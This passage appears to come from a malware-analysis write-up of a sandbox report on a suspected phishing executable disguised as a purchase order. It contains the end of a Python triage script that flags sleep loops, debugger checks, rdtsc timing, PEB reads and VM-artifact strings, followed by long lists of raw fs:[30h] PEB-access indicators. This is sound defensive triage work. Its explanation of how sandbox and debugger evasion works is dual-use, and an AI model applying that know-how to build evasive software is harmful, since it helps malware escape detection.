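Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: 1ySo2KZ76.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
"""

# "Source: <origin><column name><rest>": the origin runs straight into the column name.
KIND_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*"
    r"(?P<kind>TID:|Code function:|Binary or memory string:|Process queried:)"
    r"\s*(?P<rest>.*)$"
)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)\s*>\s*(\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s*(-?\d+)s\s*>=\s*(-?\d+)s")
# "<fid> <api chain or instruction><fid>": the function id is repeated at the end of the line.
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<body>.*?)[\s,]*(?P=fid)$")
PEB_RE = re.compile(r"mov\s+e[a-z]{2},\s*dword ptr fs:\[00000030h\]")


def triage(report_text):
    """Reduce evidence lines to the evasion indicators a triage queue cares about."""
    summary = {
        "sleep_loops": [],          # (src, tid, count, threshold) for loops over the threshold
        "sleep_magnitude": 0,       # sum of |delay| exactly as printed; no unit conversion
        "delayed_enumeration": [],  # (src, fid): Sleep inside a FindFirstFile/FindNextFile walk
        "debugger_checks": [],      # (src, detail)
        "timing_checks": [],        # (src, fid) executing rdtsc
        "peb_reads": Counter(),     # (src, fid) -> number of fs:[30h] reads in that function
        "vm_artifact_strings": [],  # strings the report tags with a VMware marker
    }
    for raw in report_text.splitlines():
        line = raw.replace("Jump to behavior", "").strip()
        m = KIND_RE.match(line)
        if not m:
            continue
        src, kind, rest = m.group("src"), m.group("kind"), m.group("rest")
        if kind == "TID:":
            tid = int(re.match(r"\d+", rest).group())
            c = SLEEP_COUNT_RE.search(rest)
            if c and int(c.group(1)) > int(c.group(2)):
                summary["sleep_loops"].append((src, tid, int(c.group(1)), int(c.group(2))))
            t = SLEEP_TIME_RE.search(rest)
            if t:
                summary["sleep_magnitude"] += abs(int(t.group(1)))
        elif kind == "Code function:":
            f = FUNC_RE.match(rest)
            if not f:
                continue
            fid, body = f.group("fid"), f.group("body")
            apis = {a.strip() for a in body.split(",") if a.strip()}
            if "Sleep" in apis and apis & {"FindFirstFileW", "FindNextFileW"}:
                summary["delayed_enumeration"].append((src, fid))
            if apis & {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}:
                summary["debugger_checks"].append((src, fid))
            if "rdtsc" in body.split():
                summary["timing_checks"].append((src, fid))
            if PEB_RE.search(body):
                summary["peb_reads"][(src, fid)] += 1
        elif kind == "Process queried:" and "DebugPort" in rest:
            # Assumption: a DebugPort query is NtQueryInformationProcess(ProcessDebugPort).
            summary["debugger_checks"].append((src, "NtQueryInformationProcess(ProcessDebugPort)"))
        elif kind == "Binary or memory string:" and "VMware" in rest:
            summary["vm_artifact_strings"].append(rest)
    return summary


def evasion_flags(summary, long_delay=30000):
    """Turn the summary into flags; long_delay mirrors the report's own -30000 threshold."""
    checks = [
        ("sleep-loop", bool(summary["sleep_loops"])),
        ("long-delay", summary["sleep_magnitude"] >= long_delay),
        ("delayed-file-enumeration", bool(summary["delayed_enumeration"])),
        ("debugger-check", bool(summary["debugger_checks"])),
        ("rdtsc-timing", bool(summary["timing_checks"])),
        ("peb-access", bool(summary["peb_reads"])),
        ("vm-artifact-strings", bool(summary["vm_artifact_strings"])),
    ]
    return [name for name, hit in checks if hit]


if __name__ == "__main__":
    s = triage(SAMPLE_REPORT)
    for key, value in s.items():
        print(f"{key}: {value}")
    print("flags:", evasion_flags(s))
```

To run it over a real export, replace SAMPLE_REPORT with the file contents. The sleep magnitude is summed exactly as printed (the report writes relative delays as negative values with an "s" suffix) and is deliberately not converted to a unit, so compare it only against thresholds expressed in the same printed scale.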
Reads of fs:[00000030h] (the PEB pointer in the 32-bit TEB; this is the route to PEB.BeingDebugged, NtGlobalFlag and the loader's module list that avoids calling IsDebuggerPresent or GetProcAddress). Repeated reads inside the same function are listed once with a count:
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_04003520 | mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_04003580 | mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_04001EE0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D437C | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C | mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D8350 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 | mov eax, dword ptr fs:[00000030h] (x15)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C310 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03750310 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A30B | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037663FF | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 | mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D43D4 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EC3CD | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A3C0 | mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037383C0 | mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B63C0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03728397 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372E388 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375438F | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0274 | mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03734260 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372826B | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A250 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736259 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B8243 | mov eax, dword ptr fs:[00000030h] (x1); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372823B | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402E1 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 | mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402A0 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 | mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E284 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0283 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C156 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C8158 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736154 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 | mov eax, dword ptr fs:[00000030h] (x4); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760124 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 | mov ecx, dword ptr fs:[00000030h] (x1); mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038061E5 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F0115 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037601F8 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 | mov eax, dword ptr fs:[00000030h] (x4); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F61C3 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B019F | mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A197 | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03770185 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EC188 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D4180 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375C073 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732050 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B6050 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C6030 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A020 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C020 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E016 | mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4000 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D2000 | mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C0F0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037720F0 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A0E3 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037380E9 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B60E0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B20DE | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F60B8 | mov eax, dword ptr fs:[00000030h] (x1); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C80A8 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373208A | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738770 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740770 | mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730750 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE75D | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772750 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4755 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376674D | mov esi, dword ptr fs:[00000030h] (x1); mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376273C | mov eax, dword ptr fs:[00000030h] (x2); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AC730 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376C720 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730710 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760710 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376C700 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037347FB | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037527ED | mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE7E1 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373C7C0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B07C3 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037307AF | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D678E | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03762674 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F866E | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A660 | mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374C640 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E627 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
